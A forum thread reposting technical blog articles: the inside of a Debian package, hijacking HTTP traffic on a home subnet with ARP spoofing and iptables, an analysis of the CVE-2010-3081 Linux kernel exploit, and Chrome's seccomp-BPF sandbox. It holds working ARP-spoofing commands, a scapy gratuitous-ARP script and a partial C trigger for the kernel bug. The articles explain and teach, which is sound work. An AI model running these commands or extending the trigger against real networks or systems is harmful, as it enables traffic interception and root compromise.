responsible for this package in Debian (the "maintainer") How the package is categorized in Debian as a whole: nano is in the "editors" section. A complete list of archive sections can be found here. A "priority" rating. "Important" means that the package "should be found on any Unix-like system". You'd be hard-pressed to find a Debian system without nano. a homepage a description which should provide enough information for an interested user to figure out whether or not she wants to install the package One line that takes a bit more explanation is the "Provides:" line. This means that nano, when installed, will not only count as having the nano package installed, but also as the editor package, which doesn't really exist—it is only provided by other packages. This way other packages which need a text editor can depend on "editor" and not have to worry about the fact that there are many different sufficient choices available. You can get most of this same information for installed packages and packages from your configured package repositories using the command aptitude show <packagename>, or dpkg --status <packagename> if the package is installed. [h=5]postinst, prerm, postrm, preinst[/h] These files are maintainer scripts. If you take a look at one, you'll see that it's just a shell script that is run at some point during the [un]installation process. spang@sencha:~/tmp/blog> cat preinst #!/bin/sh set -e if [ "$1" = "upgrade" ]; then if dpkg --compare-versions "$2" lt 1.2.4-2; then if [ ! -e /usr/man ]; then ln -s /usr/share/man /usr/man update-alternatives --remove editor /usr/bin/nano || RET=$? rm /usr/man if [ -n "$RET" ]; then exit $RET fi else update-alternatives --remove editor /usr/bin/nano fi fi fi More on the nitty-gritty of maintainer scripts can be found here. 
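Those control fields are also easy to consume from a script. Below is a small sketch (not a full deb822 parser) for the Key: Value format shown above; continuation lines, like the body of Description, start with whitespace and belong to the previous field.

def parse_control(text):
    # Parse the RFC 822-style control file into a dict of field -> value.
    fields, key = {}, None
    for line in text.splitlines():
        if line[:1].isspace() and key:            # continuation line
            fields[key] += "\n" + line.strip()
        elif ":" in line:
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    return fields

control = parse_control(open("control").read())
print(control["Package"], control["Version"])
print(control["Depends"].split(", "))             # crude split of the dependency list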
  [h=5]conffiles[/h] spang@sencha:~/tmp/blog> cat conffiles /etc/nanorc Any configuration files for the package, generally found in /etc, are listed here, so that dpkg knows when to not blindly overwrite any local configuration changes you've made when upgrading the package. [h=5]md5sums[/h] This file contains checksums of each of the data files in the package so dpkg can make sure they weren't corrupted or tampered with. [h=4]data.tar.gz[/h] Here are the actual data files that will be added to your system's / when the package is installed. spang@sencha:~/tmp/blog> tar xzvf data.tar.gz ./ ./bin/ ./bin/nano ./usr/ ./usr/bin/ ./usr/share/ ./usr/share/doc/ ./usr/share/doc/nano/ ./usr/share/doc/nano/examples/ ./usr/share/doc/nano/examples/nanorc.sample.gz ./usr/share/doc/nano/THANKS ./usr/share/doc/nano/changelog.gz ./usr/share/doc/nano/BUGS.gz ./usr/share/doc/nano/TODO.gz ./usr/share/doc/nano/NEWS.gz ./usr/share/doc/nano/changelog.Debian.gz [...] ./etc/ ./etc/nanorc ./bin/rnano ./usr/bin/nano [h=3]Finishing up[/h] That's it! That's all there is inside a Debian package. Of course, no one building a package for Debian-based systems would do the reverse of what we just did, using raw tools like ar, tar, and gzip. Debian packages use a make-based build system, and learning how to build them using all the tools that have been developed for this purpose is a topic for another time. If you're interested, the new maintainer's guide is a decent place to start. And next time, if you need to take a look inside a .deb again, use the dpkg-deb utility: spang@sencha:~/tmp/blog> dpkg-deb --extract nano_2.2.5-1_amd64.deb datafiles spang@sencha:~/tmp/blog> dpkg-deb --control nano_2.2.5-1_amd64.deb controlfiles spang@sencha:~/tmp/blog> dpkg-deb --info nano_2.2.5-1_amd64.deb new debian package, version 2.0. size 566450 bytes: control archive= 3569 bytes. 12 bytes, 1 lines conffiles 1010 bytes, 26 lines control 5313 bytes, 80 lines md5sums 582 bytes, 19 lines * postinst #!/bin/sh 160 bytes, 5 lines * postrm #!/bin/sh 379 bytes, 20 lines * preinst #!/bin/sh 153 bytes, 10 lines * prerm #!/bin/sh Package: nano Version: 2.2.5-1 Architecture: amd64 Maintainer: Jordi Mallach Installed-Size: 1824 Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info Suggests: spell Conflicts: pico Breaks: alpine-pico (<= 2.00+dfsg-5) Replaces: pico Provides: editor Section: editors Priority: important Homepage: http://www.nano-editor.org/ Description: small, friendly text editor inspired by Pico GNU nano is an easy-to-use text editor originally designed as a replacement for Pico, the ncurses-based editor from the non-free mailer package Pine (itself now available under the Apache License as Alpine). . However, nano also implements many features missing in pico, including: - feature toggles; - interactive search and replace (with regular expression support); - go to line (and column) command; - auto-indentation and color syntax-highlighting; - filename tab-completion and support for multiple buffers; - full internationalization support. If the package format ever changes again, dpkg-deb will too, and you won't even need to notice. ~spang Sursa: https://blogs.oracle.com/ksplice/entry/anatomy_of_a_debian_package
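And since the dpkg-deb commands above leave the control members in controlfiles/ and the payload in datafiles/, checking the md5sums member by hand takes only a few lines of Python. This is a sketch of roughly what can be done with that file, not a replacement for dpkg's own verification.

import hashlib, os

def verify_md5sums(md5sums_path, root):
    # Each line of md5sums is "hash  relative/path"; hash the extracted file
    # under `root` and compare.
    bad = []
    for line in open(md5sums_path):
        expected, relpath = line.split(None, 1)
        relpath = relpath.strip()
        digest = hashlib.md5(open(os.path.join(root, relpath), "rb").read()).hexdigest()
        if digest != expected:
            bad.append(relpath)
    return bad

print(verify_md5sums("controlfiles/md5sums", "datafiles") or "all checksums match")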
  4. I know the vBulletin part; I need to see what the deal is with the comments on Wordpress.
  5. Hijacking HTTP traffic on your home subnet using ARP and iptables By Ksplice Post Importer on Sep 29, 2010 Let's talk about how to hijack HTTP traffic on your home subnet using ARP and iptables. It's an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols. Please don't experiment with this outside of a subnet under your control -- it's against the law and it might be hard to get things back to their normal state. The setup Significant other comes home from work. SO pulls out laptop and tries to catch up on social media like every night. SO instead sees an awesome personalized web page proposing marriage: How do we accomplish this? The key player is ARP, the "Address Resolution Protocol" responsible for associating Internet Layer addresses with Link Layer addresses. This usually means determining the MAC address corresponding to a given IP address. ARP comes into play when you, for example, head over to a friend's house, pull out your laptop, and try to use the wireless to surf the web. One of the first things that probably needs to happen is determining the MAC address of the gateway (probably your friend's router), so that the Ethernet packets containing all those IP[TCP[HTTP]] requests you want to send out to the Internet know how to get to their first hop, the gateway. Your laptop finds out the MAC address of the gateway by asking. It broadcasts an ARP request for "Who has IP address 192.168.1.1", and the gateway broadcasts an ARP response saying "I have 192.168.1.1, and my MAC address is xx:xx:xx:xx:xx:xx". Your laptop, armed with the MAC address of the gateway, can then craft Ethernet packets that will go to the gateway and get routed out to the Internet. But the gateway didn't really have to prove who it was. It just asserted who it was, and everyone listened. Anyone else can send an ARP response claiming to have IP address 192.168.1.1. And that's the ticket: if you can pretend to be the gateway, you can control all the packets that get routed through the gateway and the content returned to clients. Step 1: The layout I did this at home. The three machines involved were: real gateway router: IP address 192.168.1.1, MAC address 68:7f:74:9a:f4:ca fake gateway: a desktop called kid-charlemagne, IP address 192.168.1.200, MAC address 00:30:1b:47:f2:74 test machine getting duped: a laptop on wireless called pixeleen, IP address 192.168.1.111, MAC address 00:23:6c:8f:3f:95 The gateway router, like most modern routers, is bridging between the wireless and wired domains, so ARP packets get broadcast to both domains. Step 2: Enable IPv4 forwarding kid-charlemagne wants to be receiving packets that aren't destined for it (e.g. the web traffic). Unless IP forwarding is enabled, the networking subsystem is going to ignore packets that aren't destined for us. So step 1 is to enable IP forwarding. All that takes is a non-zero value in /proc/sys/net/ipv4/ip_forward: root@kid-charlemagne:~# echo 1 > /proc/sys/net/ipv4/ip_forward Step 3: Set routing rules so packets going through the gateway get routed to you kid-charlemagne is going to act like a little NAT. For HTTP packets heading out to the Internet, kid-charlemagne is going to rewrite the destination address in the IP packet headers to be its own IP address, so it becomes the final destination for the web traffic: For HTTP packets heading back from kid-charlemagne to the client, it'll rewrite the source address to be that of the original destination out on the Internet. 
We can set up this routing rule with the following iptables command: jesstess@kid-charlemagne:~$ sudo iptables -t nat -A PREROUTING \ > -p tcp --dport 80 -j NETMAP --to 192.168.1.200 The iptables command has 3 components: When to apply a rule (-A PREROUTING) What packets get that rule (-p tcp --dport 80) The actual rule (-t nat ... -j NETMAP --to 192.168.1.200) When -t says we're specifying a table. The nat table is where a lookup happens on packets that create new connections. The nat table comes with 3 built-in chains: PREROUTING, OUTPUT, and POSTROUTING. We want to add a rule in the PREROUTING chain, which will alter packets right as they come in, before routing rules have been applied. What packets That PREROUTING rule is going to apply to TCP packets destined for port 80 (-p tcp --dport 80), aka HTTP traffic. For packets that match this filter, jump (-j) to the following action: The rule If we receive a packet heading for some destination, rewrite the destination in the IP header to be 192.168.1.200 (NETMAP --to 192.168.1.200). Have the nat table keep a mapping between the original destination and rewritten destination. When a packet is returning through us to its source, rewrite the source in the IP header to be the original destination. In summary: "If you're a TCP packet destined for port 80 (HTTP traffic), actually make my address, 192.168.1.200, the destination, NATting both ways so this is transparent to the source." One last thing: The networking subsystem will not allow you to ARP for a random IP address on an interface -- it has to be an IP address actually assigned to that interface, or you'll get a bind error along the lines of "Cannot assign requested address". We can handle this by adding an ip entry on the interface that is going to send packets to pixeleen, the test client. kid-charlemagne is wired, so it'll be eth0. jesstess@kid-charlemagne:~$ sudo ip addr add 192.168.1.1/24 dev eth0 We can check our work by listing all our interfaces' addresses and noting that we now have two IP addresses for eth0, the original IP address 192.168.1.200, and the gateway address 192.168.1.1. jesstess@kid-charlemagne:~$ ip addr ... 3: eth0: mtu 1500 qdisc noqueue state UNKNOWN link/ether 00:30:1b:47:f2:74 brd ff:ff:ff:ff:ff:ff inet 192.168.1.200/24 brd 192.168.1.255 scope global eth0 inet 192.168.1.1/24 scope global secondary eth0 inet6 fe80::230:1bff:fe47:f274/64 scope link valid_lft forever preferred_lft forever ... Step 4: Set yourself up to respond to HTTP requests kid-charlemagne happens to have Apache set up. You could run any minimalist web server that would, given a request for an arbitrary resource, do something interesting. Step 5: Test pretending to be the gateway At this point, kid-charlemagne is ready to pretend to be the gateway. The trouble is convincing pixeleen that the MAC address for the gateway has changed, to that of kid-charlemagne. We can do this by sending a Gratuitous ARP, which is basically a packet that says "I know nobody asked, but I have the MAC address for 192.168.1.1”. Machines that hear that Gratuitous ARP will replace an existing mapping from 192.168.1.1 to a MAC address in their ARP caches with the mapping advertised in that Gratuitous ARP. We can look at the ARP cache on pixeleen before and after sending the Gratuitous ARP to verify that the Gratuitious ARP is working. pixeleen’s ARP cache before the Gratuitous ARP: jesstess@pixleen$ arp -a ? (192.168.1.1) at 68:7f:74:9a:f4:ca on en1 ifscope [ethernet] ? 
(192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] 68:7f:74:9a:f4:ca is the MAC address of the real gateway router. There are lots of command line utilities and bindings in various programming languages that make it easy to issue ARP packets. I used the arping tool: jesstess@kid-charlemagne:~$ sudo arping -c 3 -A -I eth0 192.168.1.1 We'll send a Gratuitous ARP reply (-A), three times (-c 3), on the eth0 interface (-I eth0) for IP address 192.168.1.1. As soon as we generate the Gratuitous ARPs, if we check pixeleen's ARP cache: jesstess@pixeleen$ arp -a ? (192.168.1.1) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] ? (192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] Bam. pixeleen now thinks the MAC address for IP address 192.168.1.1 is 0:30:1b:47:f2:74, which is kid-charlemagne's address. If I try to browse the web on pixeleen, I am served the resource matching the rules in kid-charlemagne's web server. We can watch this whole exchange in Wireshark: First, the Gratuitous ARPs generated by kid-charlemagne: The only traffic getting its headers rewritten so that kid-charlemagne is the destination is HTTP traffic: TCP traffic on port 80. That means all of the non-HTTP traffic associated with viewing a web page still happens as normal. In particular, when kid-charlemagne gets the DNS resolution requests for lycos.com, the test site I visited, it will follow its routing rules and forward them to the real router, which will send them out to the Internet: The HTTP traffic gets served by kid-charlemagne: Note that the HTTP request has a source IP of 192.168.1.111, pixeleen, and a destination IP of 209.202.254.14, which dig -x 209.202.254.14 +short tells us is search-core1.bo3.lycos.com. The HTTP response has a source IP of 209.202.254.14 and a destination IP of 192.168.1.111. The fact that kid-charlemagne has rerouted and served the request is totally transparent to the client at the IP layer. Step 6: Deploy against friends and family I trust you to get creative with this. Step 7: Reset everything to the normal state To get the normal gateway back in control, delete the IP address from the interface on kid-charlemagne and delete the iptables routing rule: jesstess@kid-charlemagne:~$ sudo ip addr delete 192.168.1.1/24 dev eth0 jesstess@kid-charlemagne:~$ sudo iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200 To get the client machines to believe the router is the real gateway, you might have to clear the gateway entry from the ARP cache with arp -d 192.168.1.1, or bring your interfaces down and back up. I can verify that my TiVo corrected itself quickly without any intervention, but I won't make any promises about your networked devices. In summary That was a lot of explanatory text, but the steps required to hijack the HTTP traffic on your home subnet can be boiled down to: enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward set your routing rule: iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200 add the gateway IP address to the appropriate interface: ip addr add 192.168.1.1/24 dev eth0 ARP for the gateway MAC address: arping -c 3 -A -I eth0 192.168.1.1 substituting the appropriate IP address and interface information and tearing down when you're done. And that's all there is to it! This has been tested as working in a few environments, but it might not work in yours. 
I'd love to hear the details on if this works, works with modifications, or doesn't work (because the devices are being too clever about Gratuitous ARPs, or otherwise) in the comments. --> Huge thank-you to fellow experimenter adamf. <--- ~jesstess Sursa: https://blogs.oracle.com/ksplice/entry/hijacking_http_traffic_on_your
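For anyone without arping handy, the gratuitous ARP from step 5 can also be generated in Python with scapy. This is a sketch rather than part of the original write-up; it assumes scapy is installed, needs root, and reuses the addresses from the walkthrough above.

# pip install scapy; run as root.
from scapy.all import ARP, Ether, sendp

GATEWAY_IP = "192.168.1.1"
FAKE_MAC = "00:30:1b:47:f2:74"            # kid-charlemagne's MAC address

# Gratuitous ARP reply: "192.168.1.1 is-at 00:30:1b:47:f2:74", broadcast to the subnet.
garp = Ether(dst="ff:ff:ff:ff:ff:ff", src=FAKE_MAC) / ARP(
    op=2, psrc=GATEWAY_IP, pdst=GATEWAY_IP, hwsrc=FAKE_MAC, hwdst="ff:ff:ff:ff:ff:ff")

for _ in range(3):                         # same effect as arping -c 3 -A
    sendp(garp, iface="eth0", verbose=False)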
  6. [h=3]Anatomy of an exploit: CVE-2010-3081[/h][h=4]By Ksplice Post Importer on Sep 22, 2010[/h]It has been an exciting week for most people running 64-bit Linux systems. Shortly after "Ac1dB1tch3z" released his or her exploit of the vulnerability known as CVE-2010-3081, we saw this exploit aggressively compromising machines, with reports of compromises all over the hosting industry and many machines using our diagnostic tool and testing positive for the backdoors left by the exploit. The talk around the exploit has mostly been panic and mitigation, though, so now that people have had time to patch their machines and triage their compromised systems, what I'd like to do for you today is talk about how this bug worked, how the exploit worked, and what we can learn about Linux security. [h=3]The Ingredients of an Exploit[/h] There are three basic ingredients that typically go into a kernel exploit: the bug, the target, and the payload. The exploit triggers the bug -- a flaw in the kernel -- to write evil data corrupting the target, which is some kernel data structure. Then it prods the kernel to look at that evil data and follow it to run the payload, a snippet of code that gives the exploit the run of the system. The bug is the one ingredient that is unique to a particular vulnerability. The target and the payload may be reused by an attacker in exploits for other vulnerabilities -- if 'Ac1dB1tch3z' didn't copy them already from an earlier exploit, by himself or by someone else, he or she will probably reuse them in future exploits. Let's look at each of these in more detail. [h=3]The Bug: CVE-2010-3081[/h] An exploit starts with a bug, or vulnerability, some kernel flaw that allows a malicious user to make a mess -- to write onto its target in the kernel. This bug is called CVE-2010-3081, and it allows a user to write a handful of words into memory almost anywhere in the kernel. The bug was present in Linux's 'compat' subsystem, which is used on 64-bit systems to maintain compatibility with 32-bit binaries by providing all the system calls in 32-bit form. Now Linux has over 300 different system calls, so this was a big job. The Linux developers made certain choices in order to keep the task manageable: We don't want to rewrite the code that actually does the work of each system call, so instead we have a little wrapper function for compat mode. The wrapper function needs to take arguments from userspace in 32-bit form, then put them in 64-bit form to pass to the code that does the system call's work. Often some arguments are structs which are laid out differently in the 32-bit and 64-bit worlds, so we have to make a new 64-bit struct based on the user's 32-bit struct. The code that does the work expects to find the struct in the user's address space, so we have to put ours there. Where in userspace can we find space without stepping on toes? The compat subsystem provides a function to find it on the user's stack. Now, here's the core problem. That allocation routine went like this: static inline void __user *compat_alloc_user_space(long len) { struct pt_regs *regs = task_pt_regs(current); return (void __user *)regs->sp - len; } The way you use it looks a lot like the old familiar malloc(), or the kernel's kmalloc(), or any number of other memory-allocation routines: you pass in the number of bytes you need, and it returns a pointer where you are supposed to read and write that many bytes to your heart's content. 
But it comes -- came -- with a special catch, and it's a big one: before you used that memory, you had to check that it was actually OK for the user to use that memory, with the kernel's access_ok() function. If you've ever helped maintain a large piece of software, you know it's inevitable that someone will eventually be fooled by the analogy, miss the incongruence, and forget that check. Fortunately the kernel developers are smart and careful people, and they defied that inevitability almost everywhere. Unfortunately, they missed it in at least two places. One of those is this bug. If we call getsockopt() in 32-bit fashion on the socket that represents a network connection over IP, and pass an optname of MCAST_MSFILTER, then in a 64-bit kernel we end up in compat_mc_getsockopt(): int compat_mc_getsockopt(struct sock *sock, int level, int optname, char __user *optval, int __user *optlen, int (*getsockopt)(struct sock *,int,int,char __user *,int __user *)) { This function calls compat_alloc_user_space(), and it fails to check the result is OK for the user to access -- and by happenstance the struct it's making room for has a variable length, supplied by the user. So the attacker's strategy goes like so: Make an IP socket in a 32-bit process, and call getsockopt() on it with optname MCAST_MSFILTER. Pass in a giant length value, almost the full possible 2GB. Because compat_alloc_user_space() finds space by just subtracting the length from the user's stack pointer, with a giant length the address wraps around, down past zero, to where the kernel lives at the top of the address space. When the bug fires, the kernel will copy the original struct, which the attacker provides, into the space it has just 'allocated', starting at that address up in kernel-land. So fill that struct with, say, an address for evil code. Tune the length value so that the address where the 'new struct' lives is a particularly interesting object in the kernel, a target. The fix for CVE-2010-3081 was to make compat_alloc_user_space() call access_ok() to check for itself. More technical details are ably explained in the original report by security researcher Ben Hawkes, who brought the vulnerability to light. [h=3]The Target: Function Pointers Everywhere[/h] The target is some place in the kernel where if we make the right mess, we can leverage that into the kernel running the attacker's code, the payload. Now the kernel is full of function pointers, because secretly it's object oriented. So for example the attacker may poke some userspace object like a special file to cause the kernel to invoke a certain method on it -- and before doing so will target that method's function pointer in the object's virtual method table (called an "ops struct" in kernel lingo) which says where to find all the methods, scribbling over it with the address of the payload. A key constraint for the attacker is to pick something that will never be used in normal operation, so that nothing goes awry to catch the user's attention. This exploit uses one of three targets: the interrupt descriptor table, timer_list_fops, and the LSM subsystem. The interrupt descriptor table (IDT) is morally a big table of function pointers. When an interrupt happens, the hardware looks it up in the IDT, which the kernel has set up in advance, and calls the handler function it finds there. 
It's more complicated than that because each entry in the table also needs some metadata to say who's allowed to invoke the interrupt, whether the handler should be called with user or kernel privileges, etc. This exploit picks interrupt number 221, higher than anybody normally uses, and carefully sets up that entry in the IDT so that its own evil code is the handler and runs in kernel mode. Then with the single instruction int $221, it makes that interrupt happen.
timer_list_fops is the "ops struct" or virtual method table for a special file called /proc/timer_list. Like many other special files that make up the proc filesystem, /proc/timer_list exists to provide kernel information to userspace. This exploit scribbles on the pointer for the poll method, which is normally not even provided for this file (so it inherits a generic behavior), and which nobody ever uses. Then it just opens that file and calls poll(). I believe this could just as well have been almost any file in /proc/.
The LSM approach attacks several different ops structs of type security_operations, the tables of methods for different 'Linux security modules'. These are gigantic structs with hundreds of function pointers; the one the exploit targets in each struct is msg_queue_msgctl, the 100th one. Then it issues a msgctl system call, which causes the kernel to check whether it's authorized by calling the msg_queue_msgctl method... which is now the exploit's code.
Why three different targets? One is enough, right? The answer is flexibility. Some kernels don't have timer_list_fops. Some kernels have it, but don't make a symbol available to find its address, and the address will vary from kernel to kernel, so it's tricky to find. Other kernels pose the same obstacle with the security_operations structs, or use a different security_operations than the ones the exploit corrupts. Different kernels offer different targets, so a widely applicable exploit has to have several targets in its repertoire. This one picks and chooses which one to use depending on what it can find.
[h=3]The Payload: Steal Privileges[/h] Finally, once the bug is used to corrupt the target and the target is triggered, the kernel runs the attacker's payload, or shellcode. A simple exploit will run the bare minimum of code inside the kernel, because it's much easier to write code that can run in userspace than in kernelspace -- so it just sets the process up to have the run of the system, and then returns. This means setting the process's user ID to 0, root, so that everything else it does is with root privileges. A process's user ID is stored in different places in different kernel versions -- the system became more complicated in 2.6.29, and again in 2.6.30 -- so the exploit needs to have flexibility again. This one checks the version with uname and assembles the payload accordingly. This exploit can also clear a couple of flags to turn off SELinux, with code it optionally includes in the payload -- more flexibility. Then it lets the kernel return to userspace, and starts a root shell. In a real attack, that root shell might be used to replace key system binaries, steal data, start a botnet daemon, or install backdoors on disk to cement the attacker's control and hide their presence.
[h=3]Flexibility, or, You Can't Trust a Failing Exploit[/h] All the points of flexibility in this exploit illustrate a key lesson: you can't conclude you're safe just because an exploit fails.
For example, on a Fedora 13 system, this exploit errors out with a message like this:
$ ./ABftw
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.34.6-54.fc13.i686
[...]
!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z
Sometimes a system administrator sees an exploit fail like that and concludes they're safe. "Oh, Red Hat / Debian / my vendor says I'm vulnerable", they may say. "But the exploit doesn't work, so they're just making stuff up, right?" Unfortunately, this can be a fatal mistake. In fact, the machine above is vulnerable. The error message only comes about because the exploit can't find the symbol per_cpu__current_task, whose value it needs in the payload; it's the address at which to find the kernel's main per-process data structure, the task_struct. But a skilled attacker can find the task_struct without that symbol, by following pointers from other known data structures in the kernel. In general, there is an almost unlimited amount of work an exploit writer could put in to make the exploit function on more and more kernels. Use a wider repertoire of targets; find missing symbols by following pointers or by pattern-matching in the kernel; find missing symbols by brute force, with a table prepared in advance; disable SELinux, as this exploit does, or grsecurity; or add special code to navigate the data structures of unusual kernels like OpenVZ. If the bug is there in a kernel but the exploit breaks, it's only a matter of work or more work to extend the exploit to function there too. That's why the only way to know that a given kernel is not affected by a vulnerability is a careful examination of the bug against the kernel's source code and configuration, and never to rely on a failing exploit -- and even that examination can sometimes be mistakenly optimistic. In practice, for a busy system administrator this means that when the vendor recommends you update, the only safe choice is to update. ~price Sursa: https://blogs.oracle.com/ksplice/entry/anatomy_of_an_exploit_cve
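Tying the write-up above together, here is a hedged, deliberately non-working sketch of what the userspace side of such a trigger looks like. It has to be compiled as a 32-bit binary so the kernel takes the compat path, and the buffer contents and the length below are placeholders rather than a real offset computation:

/* Hedged sketch of the CVE-2010-3081 trigger path. Illustrative only. */
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void)
{
        int fd = socket(AF_INET, SOCK_STREAM, 0);
        char gf[64];                       /* stands in for the group_filter struct */
        socklen_t optlen = 0x7f000000;     /* "almost the full possible 2GB" (placeholder) */

        /* An attacker would place the address of the payload in here. */
        memset(gf, 0x41, sizeof(gf));

        /* On a 64-bit kernel this reaches compat_mc_getsockopt(), which calls
         * compat_alloc_user_space() with a size derived from optlen and then
         * copies user-controlled words through the unchecked pointer. */
        getsockopt(fd, IPPROTO_IP, MCAST_MSFILTER, gf, &optlen);
        return 0;
}

A real exploit must tune the length (and its own stack pointer) so that the wrapped "allocation" lands exactly on the chosen kernel target, which is the part deliberately left out here.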
  7. [h=3]Introducing Chrome's next-generation Linux sandbox[/h]Thursday, September 6, 2012 Starting with Chrome 23.0.1255.0, recently released to the Dev Channel, you will see Chrome making use of our next-generation sandbox on Linux and ChromeOS for renderers. We are using a new facility, introduced in Linux 3.5 and developed by Will Drewry, called Seccomp-BPF. Seccomp-BPF builds on the ability to send small BPF (for Berkeley Packet Filter) programs that can be interpreted by the kernel. This feature was originally designed for tcpdump, so that filters could run directly in the kernel for performance reasons. BPF programs are untrusted by the kernel, so they are limited in a number of ways. Most notably, they can't have loops, which bounds their execution time by a monotonic function of their size and allows the kernel to know they will always terminate. With Seccomp-BPF, BPF programs can now be used to evaluate system call numbers and their parameters. This is a huge change for sandboxing code in Linux, which, as you may recall, has been very limited in this area. It's also a change that recognizes and innovates in two important dimensions of sandboxing:
- Mandatory access control versus "discretionary privilege dropping". Something I always felt strongly about and have discussed before.
- Access control semantics versus attack surface reduction.
Let's talk about the second topic. Having nice, high-level access control semantics is appealing and, one may argue, necessary. When you're designing a sandbox for your application, you may want to say things such as:
- I want this process to have access to this subset of the file system.
- I want this process to be able to allocate or de-allocate memory.
- I want this process to be able to interfere (debug, send signals) with this set of processes.
The capabilities-oriented framework Capsicum takes such an approach. This is very useful. However, with such an approach it's difficult to assess the kernel's attack surface. When the whole kernel is in your trusted computing base, "you're going to have a bad time", as a colleague recently put it. Now, in that same dimension, at the other end of the spectrum, is the "attack surface reduction" oriented approach: the approach where you're close to the ugly guts of implementation details, the one taken by Seccomp-BPF. In that approach, read()+write() and vmsplice() are completely different beasts, because you're not looking at their semantics, but at the attack surface they open in the kernel. They perform similar things, but perhaps ihaquer will have a harder time exploiting read()/write() on pipes than vmsplice(). Semantically, uselib() seems to be a subset of open() + mmap(), but similarly, the attack surface is different. The drawback of course is that implementing particular sandbox semantics with such a mechanism looks ugly. For instance, let's say you want to allow opening any file in /public from within the sandbox: how would you implement that in seccomp-BPF? Well, first you need to understand what set of system calls would be concerned by such an operation. That's not just open(), but also openat() (an ugly implementation-level detail: some libc will happily use openat() with AT_FDCWD instead of open()).
Then you realize that a BPF program in the kernel will only see a pointer to the file name, so you can't filter on that (even if you could dereference pointers in BPF programs, it wouldn't be safe to do so, because an attacker could create another thread that would modify the file name after it was evaluated by the BPF program, so the kernel would also need to copy it to a safe location). In the end, what you need to do is have a trusted helper process (or broker) that runs unsandboxed for this particular set of system calls: have it accept requests to open files over an IPC channel, make the security decision, and send the file descriptor back over IPC. (If you're interested in that sort of approach, pushed to the extreme, look at Markus Gutschke's original seccomp mode 1 sandbox.) That's tedious but doable. In comparison, Capsicum would make this a breeze. There are other issues with such a low-level approach. By filtering system calls, you're breaking the kernel API. This means that third party code (such as libraries) you include in your address space can break. For this reason, I suggested to Will that he implement an "exception" mechanism through signals, so that special handlers can be called when system calls are denied. Such handlers are now used and can, for instance, "broker out" system calls such as open(). In my opinion, the Capsicum and Seccomp-BPF approaches are trade-offs, each at one end of the spectrum. Having both would be great. We could stack one on top of the other and have the best of both worlds. In a similar, but very limited, fashion, this is what we have now in Chrome: we stacked the seccomp-bpf sandbox on top of the setuid sandbox. The setuid sandbox gives a few easy-to-understand semantic properties: no file system access, no process access outside of the sandbox, no network access. It makes it much easier to layer a seccomp-bpf sandbox on top. Several people besides myself have worked on making this possible. In particular: Chris Evans, Jorge Lucangeli Obes, Markus Gutschke, Adam Langley (and others who made Chrome sandboxable under the setuid sandbox in the first place) and of course, for the actual kernel support, Will Drewry and Kees Cook. We will continue to work on improving and tightening this new sandbox; this is just a start. Please give it a try, and report any bugs to crbug.com (feel free to cc: jln at chromium.org directly). PS: to make sure that you have kernel support for seccomp-BPF, use Linux 3.5 or Ubuntu 12.04, and check about:sandbox in Chrome 22+ to see if Seccomp-BPF is enabled. Also make sure you're using the 64-bit version of Chrome. Posted by Julien Tinnes at 5:21 PM Sursa: cr0 blog: Introducing Chrome's next-generation Linux sandbox
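For readers who want to see the interface the post is describing, here is a minimal seccomp-BPF filter in C. It only illustrates the prctl()/BPF plumbing (an architecture check plus a tiny syscall whitelist) and is not Chrome's actual policy; it assumes an x86-64 build on a Linux 3.5+ kernel:

/* Minimal seccomp-BPF example: allow read, write and exit_group, kill on anything else. */
#include <stddef.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

int main(void)
{
        struct sock_filter filter[] = {
                /* Refuse to run if the process is not the expected architecture. */
                BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
                BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),
                BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
                /* Load the syscall number and whitelist a handful of calls. */
                BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
                BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_read, 3, 0),
                BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_write, 2, 0),
                BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_exit_group, 1, 0),
                BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
                BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        };
        struct sock_fprog prog = {
                .len = sizeof(filter) / sizeof(filter[0]),
                .filter = filter,
        };

        /* Required so an unprivileged process may install a filter. */
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
                return 1;
        if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog))
                return 1;

        write(1, "still alive\n", 12);   /* allowed */
        return 0;                        /* exit_group is allowed; open() would kill us */
}

The "exception" mechanism through signals mentioned in the post corresponds to returning SECCOMP_RET_TRAP instead of SECCOMP_RET_KILL, which delivers SIGSYS to a handler that can then broker the denied call.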
